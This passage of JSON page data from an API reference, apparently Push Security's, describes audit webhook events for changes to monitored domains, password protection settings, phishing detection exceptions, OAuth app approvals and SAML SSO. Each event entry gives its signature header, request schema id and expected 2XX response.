verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/monitored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_697"}},"schemaId":"schema_697","pointer":"/paths/monitored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"monitored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_697"}},"responseCodes":["2XX"],"pointer":"monitored-domains-added","href":"audit/monitored-domains-added-event","openApiOperationId":"monitored-domains-added-event","summary":"Monitored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_697","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_697"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/monitored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/monitored-domains-added-event"}],"panels":[]}]},"httpPath":"monitored-domains-added"},{"label":"Monitored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/monitored-domains-removed-event","routeSlug":"/webhooks-v1/audit/monitored-domains-removed-event","metadata":{"seo":{"title":"Monitored domains removed","description":"A set of domains have been removed from the list of monitored company domains."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"monitored-domains-removed-event","name":"Monitored domains removed","isWebhook":true,"pointer":"/paths/monitored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Monitored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of monitored company domains."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/monitored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_698"}},"schemaId":"schema_698","pointer":"/paths/monitored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"monitored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_698"}},"responseCodes":["2XX"],"pointer":"monitored-domains-removed","href":"audit/monitored-domains-removed-event","openApiOperationId":"monitored-domains-removed-event","summary":"Monitored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_698","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_698"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/monitored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/monitored-domains-removed-event"}],"panels":[]}]},"httpPath":"monitored-domains-removed"},{"label":"OAuth app approval status updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/oauth-app-approval-status-updated-event","routeSlug":"/webhooks-v1/audit/oauth-app-approval-status-updated-event","metadata":{"seo":{"title":"OAuth app approval status updated","description":"The approval status of an OAuth app has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"oauth-app-approval-status-updated-event","name":"OAuth app approval status updated","isWebhook":true,"pointer":"/paths/oauth-app-approval-status-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"OAuth app approval status updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The approval status of an OAuth app has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/oauth-app-approval-status-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_699"}},"schemaId":"schema_699","pointer":"/paths/oauth-app-approval-status-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"oauth-app-approval-status-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_699"}},"responseCodes":["2XX"],"pointer":"oauth-app-approval-status-updated","href":"audit/oauth-app-approval-status-updated-event","openApiOperationId":"oauth-app-approval-status-updated-event","summary":"OAuth app approval status updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_699","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_699"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/oauth-app-approval-status-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/oauth-app-approval-status-updated-event"}],"panels":[]}]},"httpPath":"oauth-app-approval-status-updated"},{"label":"Password protection URL masking toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/password-protection-hide-urls-toggled-event","routeSlug":"/webhooks-v1/audit/password-protection-hide-urls-toggled-event","metadata":{"seo":{"title":"Password protection URL masking toggled","description":"An admin user has toggled the password protection URL masking setting."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"password-protection-hide-urls-toggled-event","name":"Password protection URL masking toggled","isWebhook":true,"pointer":"/paths/password-protection-hide-urls-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Password protection URL masking toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the password protection URL masking setting."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/password-protection-hide-urls-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_700"}},"schemaId":"schema_700","pointer":"/paths/password-protection-hide-urls-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"password-protection-hide-urls-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_700"}},"responseCodes":["2XX"],"pointer":"password-protection-hide-urls-toggled","href":"audit/password-protection-hide-urls-toggled-event","openApiOperationId":"password-protection-hide-urls-toggled-event","summary":"Password protection URL masking toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_700","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_700"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/password-protection-hide-urls-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/password-protection-hide-urls-toggled-event"}],"panels":[]}]},"httpPath":"password-protection-hide-urls-toggled"},{"label":"Password protection ignore work apps toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/password-protection-ignore-work-apps-toggled-event","routeSlug":"/webhooks-v1/audit/password-protection-ignore-work-apps-toggled-event","metadata":{"seo":{"title":"Password protection ignore work apps toggled","description":"An admin user has toggled the \"Ignore work apps\" setting of the password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"password-protection-ignore-work-apps-toggled-event","name":"Password protection ignore work apps toggled","isWebhook":true,"pointer":"/paths/password-protection-ignore-work-apps-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Password protection ignore work apps toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the \"Ignore work apps\" setting of the password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/password-protection-ignore-work-apps-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_701"}},"schemaId":"schema_701","pointer":"/paths/password-protection-ignore-work-apps-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"password-protection-ignore-work-apps-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_701"}},"responseCodes":["2XX"],"pointer":"password-protection-ignore-work-apps-toggled","href":"audit/password-protection-ignore-work-apps-toggled-event","openApiOperationId":"password-protection-ignore-work-apps-toggled-event","summary":"Password protection ignore work apps toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_701","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_701"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/password-protection-ignore-work-apps-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/password-protection-ignore-work-apps-toggled-event"}],"panels":[]}]},"httpPath":"password-protection-ignore-work-apps-toggled"},{"label":"Password protection ignored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/password-protection-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/password-protection-ignored-domains-added-event","metadata":{"seo":{"title":"Password protection ignored domains added","description":"A set of domains have been added to the list of ignored domains for the password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"password-protection-ignored-domains-added-event","name":"Password protection ignored domains added","isWebhook":true,"pointer":"/paths/password-protection-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Password protection ignored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/password-protection-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_702"}},"schemaId":"schema_702","pointer":"/paths/password-protection-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"password-protection-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_702"}},"responseCodes":["2XX"],"pointer":"password-protection-ignored-domains-added","href":"audit/password-protection-ignored-domains-added-event","openApiOperationId":"password-protection-ignored-domains-added-event","summary":"Password protection ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_702","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_702"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/password-protection-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/password-protection-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"password-protection-ignored-domains-added"},{"label":"Password protection ignored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/password-protection-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/password-protection-ignored-domains-removed-event","metadata":{"seo":{"title":"Password protection ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"password-protection-ignored-domains-removed-event","name":"Password protection ignored domains removed","isWebhook":true,"pointer":"/paths/password-protection-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Password protection ignored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/password-protection-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_703"}},"schemaId":"schema_703","pointer":"/paths/password-protection-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"password-protection-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_703"}},"responseCodes":["2XX"],"pointer":"password-protection-ignored-domains-removed","href":"audit/password-protection-ignored-domains-removed-event","openApiOperationId":"password-protection-ignored-domains-removed-event","summary":"Password protection ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_703","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_703"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/password-protection-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/password-protection-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"password-protection-ignored-domains-removed"},{"label":"Phishing tool detection ignored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/phishing-tool-detection-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/phishing-tool-detection-ignored-domains-added-event","metadata":{"seo":{"title":"Phishing tool detection ignored domains added","description":"A set of domains have been added to the list of ignored domains for the Phishing tool detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-tool-detection-ignored-domains-added-event","name":"Phishing tool detection ignored domains added","isWebhook":true,"pointer":"/paths/phishing-tool-detection-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing tool detection ignored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the Phishing tool detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-tool-detection-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_704"}},"schemaId":"schema_704","pointer":"/paths/phishing-tool-detection-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-tool-detection-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_704"}},"responseCodes":["2XX"],"pointer":"phishing-tool-detection-ignored-domains-added","href":"audit/phishing-tool-detection-ignored-domains-added-event","openApiOperationId":"phishing-tool-detection-ignored-domains-added-event","summary":"Phishing tool detection ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_704","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_704"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-tool-detection-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/phishing-tool-detection-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"phishing-tool-detection-ignored-domains-added"},{"label":"Phishing tool detection ignored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/phishing-tool-detection-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/phishing-tool-detection-ignored-domains-removed-event","metadata":{"seo":{"title":"Phishing tool detection ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the Phishing tool detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-tool-detection-ignored-domains-removed-event","name":"Phishing tool detection ignored domains removed","isWebhook":true,"pointer":"/paths/phishing-tool-detection-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing tool detection ignored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the Phishing tool detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-tool-detection-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_705"}},"schemaId":"schema_705","pointer":"/paths/phishing-tool-detection-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-tool-detection-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_705"}},"responseCodes":["2XX"],"pointer":"phishing-tool-detection-ignored-domains-removed","href":"audit/phishing-tool-detection-ignored-domains-removed-event","openApiOperationId":"phishing-tool-detection-ignored-domains-removed-event","summary":"Phishing tool detection ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_705","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_705"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-tool-detection-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/phishing-tool-detection-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"phishing-tool-detection-ignored-domains-removed"},{"label":"Reused password exceptions updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/reused-password-exceptions-updated","routeSlug":"/webhooks-v1/audit/reused-password-exceptions-updated","metadata":{"seo":{"title":"Reused password exceptions updated","description":"The reused password exceptions list has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"reused-password-exceptions-updated","name":"Reused password exceptions updated","isWebhook":true,"pointer":"/paths/reused-password-finding-exceptions-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Reused password exceptions updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The reused password exceptions list has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/reused-password-finding-exceptions-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_706"}},"schemaId":"schema_706","pointer":"/paths/reused-password-finding-exceptions-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"reused-password-finding-exceptions-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_706"}},"responseCodes":["2XX"],"pointer":"reused-password-finding-exceptions-updated","href":"audit/reused-password-exceptions-updated","openApiOperationId":"reused-password-exceptions-updated","summary":"Reused password exceptions updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_706","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_706"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/reused-password-finding-exceptions-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/reused-password-exceptions-updated"}],"panels":[]}]},"httpPath":"reused-password-finding-exceptions-updated"},{"label":"SAML SSO added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/saml-sso-added-event","routeSlug":"/webhooks-v1/audit/saml-sso-added-event","metadata":{"seo":{"title":"SAML SSO added","description":"A SAML SSO connection has been added."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"saml-sso-added-event","name":"SAML SSO added","isWebhook":true,"pointer":"/paths/saml-sso-added-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SAML SSO 